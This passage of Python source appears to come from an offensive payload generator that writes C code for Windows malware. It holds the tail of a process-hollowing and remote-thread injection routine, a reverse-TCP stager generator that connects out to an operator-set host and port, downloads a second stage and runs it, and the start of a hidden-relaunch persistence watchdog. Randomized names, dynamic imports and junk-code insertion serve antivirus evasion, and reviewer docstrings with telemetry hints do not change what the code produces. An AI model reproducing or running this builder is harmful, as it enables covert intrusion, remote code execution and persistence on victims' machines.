        Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
        Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress),(PVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "->PointerToRawData)," + RandImgSectHeader + "->SizeOfRawData, NULL);}\n"

    else:
        Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
        Ret_code += "for (int " + Randflag + "= 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
        Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
        Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress),(PVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "->PointerToRawData)," + RandImgSectHeader + "->SizeOfRawData, NULL);}\n"

    Ret_code += "if(" + RandDelta + " != 0){\n"
    Ret_code += "for (int " + Randflag2 + " = 0;" + Randflag2 + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag2 + "++){\n"
        #.reloc section
    Ret_code += "char* " + RandSectName + " = \".reloc\";\n"
    Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag2 + "*sizeof(IMAGE_SECTION_HEADER)));\n"
    Ret_code += "if(memcmp(" + RandImgSectHeader + "->Name, " + RandSectName + ",strlen(" + RandSectName + ")))continue;\n"
    Ret_code += "DWORD " + RandRelocSectRawData + " = " + RandImgSectHeader + "->PointerToRawData;\n"
    Ret_code += "DWORD " + RandOffsetInRelocSect + " = 0;\n"
    Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
    #relocation data
    Ret_code += "while(" + RandOffsetInRelocSect + "<" + RandrelocData + ".Size){\n"
    Ret_code += "PBASE_RELOCATION_BLOCK pBlockheader = (PBASE_RELOCATION_BLOCK)((SIZE_T)" + Randlpv + "+" + RandRelocSectRawData + "+" + RandOffsetInRelocSect + ");\n"
    Ret_code += RandOffsetInRelocSect + "+=sizeof(BASE_RELOCATION_BLOCK);\n"
    Ret_code += "DWORD " + RandEntryCount + " = pBlockheader->BlockSize - (sizeof(BASE_RELOCATION_BLOCK)) / (sizeof(BASE_RELOCATION_ENTRY));\n"
    Ret_code += "PBASE_RELOCATION_ENTRY " + RandPBlocks + " = (PBASE_RELOCATION_ENTRY)((SIZE_T)" + Randlpv + "+" + RandRelocSectRawData + "+" + RandOffsetInRelocSect + ");\n"
    Ret_code += "for(DWORD " + Randflag3 + " =0;" + Randflag3 + "<" + RandEntryCount + ";" + Randflag3 + "++){\n"
    Ret_code += RandOffsetInRelocSect + "+=sizeof(BASE_RELOCATION_ENTRY);\n"
    Ret_code += "if(" + RandPBlocks + "[" + Randflag3 + "].Type==0)continue;\n"
    Ret_code += "SIZE_T " + RandFieldAddr + " = pBlockheader->PageAddress + " + RandPBlocks + "[" + Randflag3 + "].Offset;\n"
    Ret_code += "SIZE_T " + RandDwBuff + " = 0;\n"

    if ModOpt["DynImport"] == True:

        Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),0);\n"
        Ret_code += RandDwBuff + "+=" + RandDelta + ";\n"
        Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),NULL);}}}}\n"

        Ret_code += "DWORD " + RandlOldProtect + " = 0;\n"
        Ret_code += NdcVirtualProtectEx + "(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,PAGE_READONLY, &" + RandlOldProtect + ");\n"

    else:

        Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),0);\n"
        Ret_code += RandDwBuff + "+=" + RandDelta + ";\n"
        Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),NULL);}}}}\n"
        Ret_code += "DWORD " + RandlOldProtect + " = 0;\n"
        Ret_code += "VirtualProtectEx(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,PAGE_READONLY, &" + RandlOldProtect + ");\n"

    Ret_code += "for(int " + Randflag + " = 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
    Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
    Ret_code += "DWORD " + RandlNewProtect + " = 0;\n"
    Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_EXECUTE){\n"
    Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_READ){\n"
    Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
    Ret_code += RandlNewProtect + " = PAGE_EXECUTE_READWRITE;\n"
    Ret_code += "}else{\n"
    Ret_code += RandlNewProtect + " = PAGE_EXECUTE_READ;}\n"
    Ret_code += "}else{\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
    Ret_code += RandlNewProtect + " = PAGE_EXECUTE_WRITECOPY;\n"
    Ret_code += "}else{\n"
    Ret_code += RandlNewProtect + " = PAGE_EXECUTE;}}\n"
    Ret_code += "}else{\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_READ){\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
    Ret_code += RandlNewProtect + " = PAGE_READWRITE;\n"
    Ret_code += "}else{\n"
    Ret_code += RandlNewProtect + " = PAGE_READONLY;}\n"
    Ret_code += "}else{\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
    Ret_code += RandlNewProtect + " = PAGE_WRITECOPY;\n"
    Ret_code += "}else{\n"
    Ret_code += RandlNewProtect + " = PAGE_NOACCESS;}}}\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_NOT_CACHED){\n"
    Ret_code += RandlNewProtect + " |= PAGE_NOCACHE;}\n"

    if ModOpt["DynImport"] == True:

        Ret_code += NdcVirtualProtectEx + "(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress)," + RandImgSectHeader + "->SizeOfRawData," + RandlNewProtect + ",&" + RandlOldProtect + ");}\n"
    else:
        Ret_code += "VirtualProtectEx(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress)," + RandImgSectHeader + "->SizeOfRawData," + RandlNewProtect + ",&" + RandlOldProtect + ");}\n"

    if ModOpt["ExecMethod"] in ["ProcessHollowing","PH"]:

        if ModOpt["DynImport"] == True:

            NdcSetThreadContext = varname_creator()
            NdcResumeThread = varname_creator()

            if ModOpt["Arch"] == "x86":

                Ret_code += RandTcontext + ".Eax = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
                Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"

            else:

                Ret_code += RandTcontext + ".Rcx = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
                Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext + ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"

            Ret_code += "FARPROC " + NdcSetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"SetThreadContext\");\n"
            Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"ResumeThread\");\n"
            Ret_code += NdcSetThreadContext + "(" + Randpi + ".hThread,&" + RandTcontext+ ");\n"
            Ret_code += NdcResumeThread + "(" + Randpi + ".hThread);\n"

        else:

            if ModOpt["Arch"] == "x86":
                Ret_code += RandTcontext + ".Eax = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
                Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"

            else:

                Ret_code += RandTcontext + ".Rcx = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
                Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext + ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"

            Ret_code += "SetThreadContext(" + Randpi + ".hThread,&" + RandTcontext+ ");\n"
            Ret_code += "ResumeThread(" + Randpi + ".hThread);\n"

        Ret_code += "return 1;\n"
        Ret_code += "}}\n"

    elif ModOpt["ExecMethod"] in ["Chimera","C"]:

        Randthread = varname_creator()
        Randhand = varname_creator()
        Randresult = varname_creator()

        if ModOpt["DynImport"] == True:

            NdcCreateRemoteThread = varname_creator()
            NdcWaitForSingleObject = varname_creator()
            
            Ret_code += "DWORD " + Randthread + ";\n"
            Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
            Ret_code += "HANDLE " + Randhand + " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint),NULL,0,&"+ Randthread + ");\n"
            Ret_code += "FARPROC " + NdcWaitForSingleObject + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
            Ret_code += NdcWaitForSingleObject + "(" + Randhand + ",-1);}}}}\n"

        else:
            Ret_code += "DWORD " + Randthread + ";\n"
            Ret_code += "HANDLE " + Randhand + " = CreateRemoteThread(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint),NULL,0,&"+ Randthread + ");\n"
            Ret_code += "DWORD " + Randresult + " = WaitForSingleObject(" + Randhand + ",-1);}}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
def RevTcpStager_C_windows(ModOpt):
    """Assemble the C source text of a Windows reverse-TCP stager and write it to Source.c.

    This function performs no network or memory operations itself; it only
    concatenates C statements into ``Ret_code`` and hands the result to
    ``WriteSource``. It returns None implicitly.

    ModOpt keys read here: "Arch", "MemAlloc", "ExecMethod", "Outformat",
    "Reflective" (only when Outformat is "dll"), "DynImport", "Lhost",
    "Lport", "JI", "JF", "EF", "JR".

    ModOpt keys written here (side effects visible to the caller and to the
    helpers that receive ModOpt): "Bufflen", "Buff", "Lpvoid", "Decoder",
    and, when DynImport is True, "NtdllHandle" and "Ker32Handle".

    Review notes (defensive reading of the emitted program):
    - "Lhost" and "Lport" are concatenated into the C text without any
      escaping or validation, so the emitted source is only as well-formed
      as those option values.
    - The emitted program's observable sequence is: Winsock start-up, an
      outbound TCP connect, a 4-byte length read, a buffer filled from the
      socket, then a hand-off to whichever inject_utils execution helper is
      selected. That sequence, not the identifier names, is what endpoint
      and network telemetry can key on.
    - varname_creator, IncludeShuffler, WindowsDefend, JunkInjector and the
      inject_utils helpers are defined outside this block; their behaviour
      is not described here beyond how their return values are used.
    """

    # Identifier names for the emitted C variables.
    # presumably varname_creator() returns a fresh random C identifier — TODO confirm
    Randvarsize = varname_creator()
    Randlpv = varname_creator()
    Randvar = varname_creator()
    Randversion = varname_creator()
    Randwsadata = varname_creator()
    Randtarget = varname_creator()
    Randsock = varname_creator()
    RandSocket = varname_creator()
    Randint = varname_creator()
    Randtret = varname_creator()
    Randnret = varname_creator()
    Randstartb = varname_creator()

    # "Bufflen" is a C expression (text, not a number): the received size plus
    # 5 on x86 or plus 10 otherwise, matching the offsets used for Randstartb below.
    if ModOpt["Arch"] == "x86":

        ModOpt["Bufflen"] = Randvarsize + " + 5"
    else:
        ModOpt["Bufflen"] = Randvarsize + " + 10"

    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # Both branches use Randlpv as "Buff"; only the shared-section modes get a
    # separate identifier for "Lpvoid".
    if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:

        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = varname_creator()
    else:
        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = Randlpv

    # Stored as the string "False", not the boolean.
    ModOpt["Decoder"] = "False"

    Ret_code = ""
    Ret_code += "#define _WIN32_WINNT 0x0500\n"
    # winsock2.h is emitted before the shuffled list, which contains windows.h.
    Ret_code += "#include <winsock2.h>\n"

    Include_List = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n", "#include <tlhelp32.h>\n"
    ]

    # presumably returns the include lines joined in a shuffled order — TODO confirm
    Ret_code += IncludeShuffler(Include_List)

    # Entry-point wrapper: main() for an exe, DllMain() guarded on
    # DLL_PROCESS_ATTACH for a dll. Any other Outformat emits no wrapper.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # DynImport mode: emit module-handle lookups so later calls can be resolved
    # with GetProcAddress instead of appearing as direct calls in the source.
    # These two ModOpt keys are assigned again further down in this function.
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are literal marker lines in the text.
    # presumably consumed by JunkInjector below — TODO confirm
    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    # Size variable for the incoming data: 32-bit on x86, 64-bit otherwise.
    if ModOpt["Arch"] == "x86":

        Ret_code += "ULONG32 " + Randvarsize + ";\n"
    else:
        Ret_code += "ULONG64 " + Randvarsize + ";\n"

    Ret_code += "int " + Randvar + ";\n"
    Ret_code += "WORD " + Randversion + " = MAKEWORD(2,2);\n"
    Ret_code += "WSADATA " + Randwsadata + ";\n"

    # Winsock start-up. In DynImport mode WSAStartup/WSACleanup are resolved
    # from ws2_32.dll via GetProcAddress; otherwise they are called directly.
    if ModOpt["DynImport"] == True:

        # Overwrites the handle names assigned earlier and emits a second pair
        # of GetModuleHandle declarations under the new names.
        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        WS2_32 = varname_creator()
        NdcWSAStartup = varname_creator()
        NdcWSACleanup = varname_creator()
        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + WS2_32 + " = GetModuleHandle(\"ws2_32.dll\");\n"
        Ret_code += "FARPROC " + NdcWSAStartup + " = GetProcAddress(" + WS2_32 + ", \"WSAStartup\");\n"
        Ret_code += "FARPROC " + NdcWSACleanup + " = GetProcAddress(" + WS2_32 + ", \"WSACleanup\");\n"
        Ret_code += "if (" + NdcWSAStartup + "(" + Randversion + ", &" + Randwsadata + ") < 0){"
        Ret_code += NdcWSACleanup + "();exit(1);}\n"
    else:
        Ret_code += "if (WSAStartup(" + Randversion + ", &" + Randwsadata + ") < 0){"
        Ret_code += "WSACleanup();exit(1);}\n"

    # Socket creation, name resolution and connect. socket(), gethostbyname(),
    # connect(), closesocket() and recv() are emitted as direct calls in both
    # modes; only WSAStartup/WSACleanup differ under DynImport.
    Ret_code += "struct hostent * " + Randtarget + ";\n"
    Ret_code += "struct sockaddr_in " + Randsock + ";\n"
    Ret_code += "SOCKET " + RandSocket + " = socket(AF_INET, SOCK_STREAM, 0);\n"
    Ret_code += "if (" + RandSocket + " == INVALID_SOCKET){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
    # Lhost is placed inside a C string literal verbatim (no escaping).
    Ret_code += Randtarget + " = gethostbyname(\"" + ModOpt[
        "Lhost"] + "\");\n"  #Lhost
    Ret_code += "if (" + Randtarget + " == NULL){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
    Ret_code += "memcpy(&" + Randsock + ".sin_addr.s_addr, " + Randtarget + "->h_addr, " + Randtarget + "->h_length);\n"
    Ret_code += Randsock + ".sin_family = AF_INET;\n"
    # Lport is placed inside htons((...)) verbatim, so it must be text here.
    Ret_code += Randsock + ".sin_port = htons((" + ModOpt[
        "Lport"] + "));\n"  #Lport
    # The connect-failure block is opened here and closed by the first line of
    # whichever branch follows.
    Ret_code += "if (connect(" + RandSocket + ",(struct sockaddr *)&" + Randsock + ",sizeof(" + Randsock + "))){closesocket(" + RandSocket + ");\n"

    # Read a 4-byte length into the size variable and exit unless exactly 4
    # bytes arrived and the value is positive; then declare the buffer pointer.
    if ModOpt["DynImport"] == True:

        Ret_code += NdcWSACleanup + "();exit(1);}\n"
        Ret_code += "int " + Randint + " = recv(" + RandSocket + ", (char *)&" + Randvarsize + ", 4, 0);\n"
        Ret_code += "if (" + Randint + " != (4) || " + Randvarsize + " <= 0) {closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}\n"
        Ret_code += "char * " + Randlpv + ";\n"
    else:
        Ret_code += "WSACleanup();exit(1);}\n"
        Ret_code += "int " + Randint + " = recv(" + RandSocket + ", (char *)&" + Randvarsize + ", 4, 0);\n"
        Ret_code += "if (" + Randint + " != (4) || " + Randvarsize + " <= 0) {closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
        Ret_code += "char * " + Randlpv + ";\n"

    # presumably emits the allocation for ModOpt["Buff"] sized by
    # ModOpt["Bufflen"], per ModOpt["MemAlloc"] — verify against inject_utils
    Ret_code += inject_utils.Win_MemLocal(ModOpt)

    # The start of the buffer is filled locally: byte 0xBF (x86) or bytes
    # 0x48,0xBF (otherwise), followed by 4 bytes copied from the SOCKET variable.
    # NOTE(review): looks like a prefix that passes the socket value to the
    # received data — confirm against the expected second stage.
    if ModOpt["Arch"] == "x86":

        Ret_code += Randlpv + "[0] = 0xBF;\n"
        Ret_code += "memcpy(" + Randlpv + " + 1, &" + RandSocket + ",4);\n"
    else:
        Ret_code += Randlpv + "[0] = 0x48;\n"
        Ret_code += Randlpv + "[1] = 0xBF;\n"
        Ret_code += "memcpy(" + Randlpv + " + 2, &" + RandSocket + ",4);\n"

    Ret_code += "int " + Randtret + "=0;int " + Randnret + "=0;\n"

    # Received data is written after the local prefix: offset 5 on x86,
    # offset 10 otherwise (the same constants used for "Bufflen").
    if ModOpt["Arch"] == "x86":

        Ret_code += "void * " + Randstartb + " = " + Randlpv + " + 5;\n"
    else:
        Ret_code += "void * " + Randstartb + " = " + Randlpv + " + 10;\n"

    # Receive loop: keep calling recv() until the running total reaches the
    # announced size. The SOCKET_ERROR check is emitted after the pointer and
    # total have already been advanced by the recv() return value.
    Ret_code += "while (" + Randnret + " < " + Randvarsize + "){\n"
    Ret_code += Randtret + " = recv(" + RandSocket + ", (char *)" + Randstartb + ", " + Randvarsize + " - " + Randnret + ", 0);\n"
    Ret_code += Randstartb + " += " + Randtret + ";" + Randnret + " += " + Randtret + ";\n"

    if ModOpt["DynImport"] == True:
        Ret_code += "if (" + Randtret + " == SOCKET_ERROR) {closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}}\n"
    else:
        Ret_code += "if (" + Randtret + " == SOCKET_ERROR) {closesocket(" + RandSocket + ");WSACleanup();exit(1);}}\n"

    Ret_code += Randint + " = " + Randnret + ";\n"

    # For "RW/..." allocation modes with local execution, a protection-change
    # step is emitted before execution.
    # presumably RW -> executable; verify against inject_utils.Win_ChangeMemProtect
    if "RW/" in MemAlloc and ExecMethod in ["Thread", "APC"]:

        Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

    # Execution hand-off: "Thread"/"APC" use the local-thread helper, every
    # other ExecMethod value falls through to the remote-injection helper.
    if ModOpt["ExecMethod"] in ["Thread", "APC"]:

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # Post-processes the whole text; the result replaces Ret_code.
    # presumably inserts filler code around the "$:" markers — TODO confirm
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    # Close the wrapper opened above; appended after JunkInjector has run.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    # Output file name is fixed; where it lands depends on WriteSource.
    WriteSource("Source.c", Ret_code)
def Persistence_C_KeepAliveProcess_windows(ModOpt):
    """Assemble the C source text of a process keep-alive watchdog and write it to Source.c.

    This function only builds text. The emitted program loops forever: it
    walks a process snapshot, compares each entry's szExeFile with the
    "ProcTarget" value using strcmp, calls WinExec on "Binpath" when no entry
    matched, then sleeps for "Timevar" before checking again. It returns None
    implicitly.

    ModOpt keys read here: "Binpath", "ProcTarget", "Timevar", "Outformat",
    "Reflective" (only when Outformat is "dll"), "DynImport", "JI", "JF",
    "EF", "JR".

    ModOpt keys written here (when DynImport is True): "NtdllHandle",
    "Ker32Handle".

    Review notes (defensive reading of the emitted program):
    - "Binpath", "ProcTarget" and "Timevar" are concatenated into the C text
      without escaping or validation; the first two end up inside C string
      literals and the third inside a Sleep(...) call.
    - The match is an exact, case-sensitive strcmp on the image file name
      only, not the full path.
    - WinExec is emitted with a second argument of 0, which is SW_HIDE in the
      Win32 headers. Process-creation telemetry would show the same parent
      relaunching the same command line each time the watched name is absent
      from the snapshot, at an interval set by "Timevar".
    - varname_creator, IncludeShuffler, WindowsDefend, JunkInjector and
      WriteSource are defined outside this block.
    """

    FilePath = ModOpt["Binpath"]
    Procname = ModOpt["ProcTarget"]
    WaitBeforeCheck = ModOpt["Timevar"]
    # presumably varname_creator() returns a fresh random C identifier — TODO confirm
    RandBool = varname_creator()
    RandEntry = varname_creator()
    RandHandle = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n",
        "#include <tlhelp32.h>\n"
    ]

    # presumably returns the include lines joined in a shuffled order — TODO confirm
    Ret_code += IncludeShuffler(IncludeList)

    # Entry-point wrapper: main() for an exe, DllMain() guarded on
    # DLL_PROCESS_ATTACH for a dll. Any other Outformat emits no wrapper.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # "$:START", "$:EVA" and "$:END" are literal marker lines in the text.
    # presumably consumed by JunkInjector below — TODO confirm
    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    # Start of the endless watchdog loop; the "found" flag and the
    # PROCESSENTRY32 record are re-declared on every iteration.
    Ret_code += "while (TRUE){\n"
    Ret_code += "BOOL " + RandBool + " = FALSE;\n"
    Ret_code += "PROCESSENTRY32 " + RandEntry + ";\n"
    Ret_code += RandEntry + ".dwSize = sizeof(PROCESSENTRY32);\n"

    # DynImport mode: these module-handle lookups are emitted inside the
    # while loop, since the loop was opened just above.
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # Process enumeration and relaunch. The DynImport branch resolves the
    # toolhelp functions and WinExec from kernel32 via GetProcAddress; the
    # other branch emits direct calls and also closes the snapshot handle.
    if ModOpt["DynImport"] == True:

        NdcTl32Snapshot = varname_creator()
        NdcProcess32First = varname_creator()
        NdcProcess32Next = varname_creator()
        NdcOpenProcess = varname_creator()
        NdcWinExec = varname_creator()

        Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
        Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"Process32First\");\n"
        Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"Process32Next\");\n"
        # OpenProcess is resolved here; no call through it is emitted in this block.
        Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"OpenProcess\");\n"
        Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "FARPROC " + NdcWinExec + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"WinExec\");\n"
        Ret_code += "if (" + RandBool + " == FALSE ){" + NdcWinExec + "(\"" + FilePath + "\",0);}}\n"
    else:

        Ret_code += "HANDLE " + RandHandle + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);\n"
        Ret_code += "if (Process32First(" + RandHandle + ", &" + RandEntry + ")){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
